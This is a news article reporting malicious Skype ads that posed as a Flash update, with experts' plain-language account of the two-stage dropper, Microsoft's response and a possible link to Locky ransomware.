Skype Malware Ads
The ad pretended to be a Flash update for the computer’s browser and would prompt the user to download an HTML application named “FlashPlayer.hta.” - Image: Reddit

The Internet is a place where you can find pretty much anything. Along with the good content, however, comes a huge variety of things designed to exploit security vulnerabilities and the goodwill of several users.

A Reddit user has now revealed in a thread that a malicious ad appeared while he was on Skype’s home screen. The ad pretended to be a Flash update for the computer’s browser and would prompt the user to download an HTML application named “FlashPlayer.hta.”

It appears that once opened, that HTML app would download a malicious payload, which could potentially harm a computer in the long run. The Redditor didn’t run the application, instead, he has already deconstructed the code and has posted it publicly on Reddit.

Other users have complained about malicious ads inside Skype, with the “fake Flash update” as a common denominator.

//twitter.com/ElectriicDev/status/847474592109125632

How the malicious code works

In response to the Reddit thread, ZDNet has contacted several experts to deconstruct the code and explain how it works. According to malware experts, the malicious ads have the following characteristics:

  • They target Windows machines by pushing a file download
  • When users open the file, they trigger obfuscated JavaScript
  • The code starts a new command line, then deletes the app the user just opened
  • It then runs a PowerShell command, which downloads JavaScript Encoded Script (JSE) from a domain that no longer exists

In addition, ZDNet has contacted Ali-Reza Anghaie, co-founder of cybersecurity firm Phobos Group, to comment on the matter. Anghaie has said that “This is what’s generally called a ‘two stage dropper’. It’s effectively the utility component of the malware that then decides what else to do based on the command and control it connects to.”

Microsoft: Customers should be cautious

Responding to the issue, a Microsoft spokesperson has said that the Redmond giant should not be held responsible.

The company’s spokesperson has explained that “[Microsoft is] aware of a social engineering technique that could be used to direct some customers to a malicious website. [Microsoft continues] to encourage customers to exercise caution when opening unsolicited attachments and links from both known and unknown sources and install and regularly update antivirus software.

A spin-off of Locky ransomware?

According to the Reddit thread and to the several experts that ZDNet has contacted, this “fake Flash update” could be a spin-off of a recent Locky ransomware campaign. The Locky ransomware malware uses a JavaScript file in order to download ransomware to computers.

In November 2016, Microsoft warned against a Black Friday malware. Using the large volume of Black Friday purchases, the Locky ransomware malware could successfully spoof Amazon emails.

The Locky ransomware also hit Facebook and other social media, in November 2016. The security firm called Check Point uncovered this new method of distributing malware code through image files.